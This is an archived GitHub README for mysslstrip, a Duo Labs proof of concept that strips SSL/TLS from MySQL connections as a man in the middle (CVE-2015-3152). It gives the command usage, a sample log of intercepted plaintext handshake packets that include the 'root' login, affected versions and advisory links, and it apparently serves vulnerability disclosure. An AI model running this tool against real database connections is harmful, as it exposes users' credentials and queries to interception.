Skip to content
This repository has been archived by the owner on Apr 1, 2020. It is now read-only.

duo-labs/mysslstrip

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 

Repository files navigation

mysslstrip

mysslstrip is a Python-based proof of concept showing how to MITM MySQL traffic and strip SSL/TLS, as per CVE-2015-3152.

Usage

mysslstrip.py [-h] [-p LISTEN_PORT] [-i LISTEN_INTERFACE] dest

Example Output

[root@duo1 ~]# python2.7 mysslstrip.py -p 3307 127.0.0.1:3306
2015-04-29 21:33:14+0000 [-] Log opened.
2015-04-29 21:33:14+0000 [-] listen: 127.0.0.1:3307; connect: 127.0.0.1:3306
2015-04-29 21:33:14+0000 [-] MySQLForwardServerFactory starting on 3307
2015-04-29 21:33:14+0000 [-] Starting factory <__main__.MySQLForwardServerFactory instance at 0x7f7769912fc8>
2015-04-29 21:33:21+0000 [__main__.MySQLForwardServerFactory] Starting factory <twisted.internet.endpoints.OneShotFactory instance at 0x7f776787c248>
2015-04-29 21:33:21+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: 'J\x00\x00\x00\n5.6.21\x00\x04\x00\x00\x00"l{I8{%D\x00\xff\xff\x08\x02\x00\x7f\xc0\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00fSPsur[Rg/S6\x00mysql_native_password\x00'
2015-04-29 21:33:21+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '\xb6\x00\x00\x01\x85\xa6\x7f@\x00\x00\x00\x01!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x14U\xe7\x0b\x0cs\xb5\xf3\x00\x07&=\xa8\xa6\xf9I\xf0\x86}G\xffmysql_native_password\x00e\x03_os\x05Linux\x0c_client_name\x08libmysql\x04_pid\x042361\x0f_client_version\x065.6.21\t_platform\x06x86_64\x0cprogram_name\x05mysql'
2015-04-29 21:33:21+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: '\x07\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00'
2015-04-29 21:33:21+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '!\x00\x00\x00\x03select @@version_comment limit 1'
2015-04-29 21:33:21+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: "\x01\x00\x00\x01\x01'\x00\x00\x02\x03def\x00\x00\x00\x11@@version_comment\x00\x0c!\x00x\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x05\x00\x00\x03\xfe\x00\x00\x02\x00)\x00\x00\x04(Distributed by The IUS Community Project\x05\x00\x00\x05\xfe\x00\x00\x02\x00"
2015-04-29 21:33:27+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '\x16\x00\x00\x00\x03SELECT "HELLO, WORLD"'
2015-04-29 21:33:27+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: '\x01\x00\x00\x01\x01"\x00\x00\x02\x03def\x00\x00\x00\x0cHELLO, WORLD\x00\x0c!\x00$\x00\x00\x00\xfd\x01\x00\x1f\x00\x00\x05\x00\x00\x03\xfe\x00\x00\x02\x00\r\x00\x00\x04\x0cHELLO, WORLD\x05\x00\x00\x05\xfe\x00\x00\x02\x00'
2015-04-29 21:33:33+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '\x01\x00\x00\x00\x01'

Additional Information

Is this a real vulnerability?

Yes! Encrypt all the things. Allowing opportunistic degradation of encryption is pretty poor practice.

The vulnerability affects MySQL 5.7.2 and earlier versions, along with MySQL Connector versions 6.1.2 and earlier, all versions of Percona Server and all versions of MariaDB.

Patch?

It's been fixed in MySQL 5.7.3 ... but the security patch hasn't been backported to any other version, so if you're on 5.6 like 99.99% of the Internet is, you're out of luck unless you switch to the 5.7 "preview release".

Created by Adam Goodman of Duo Labs.

Inquiries?

PR Inquiries: [email protected]
Technical Inquiries: [email protected]
Twitters: @duo_labs

References

http://backronym.fail
https://www.duosecurity.com/blog/backronym-mysql-vulnerability
http://www.openwall.com/lists/oss-security/2015/04/29/4
http://www.ocert.org/advisories/ocert-2015-003.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152

Releases

No releases published

Packages

No packages published

Languages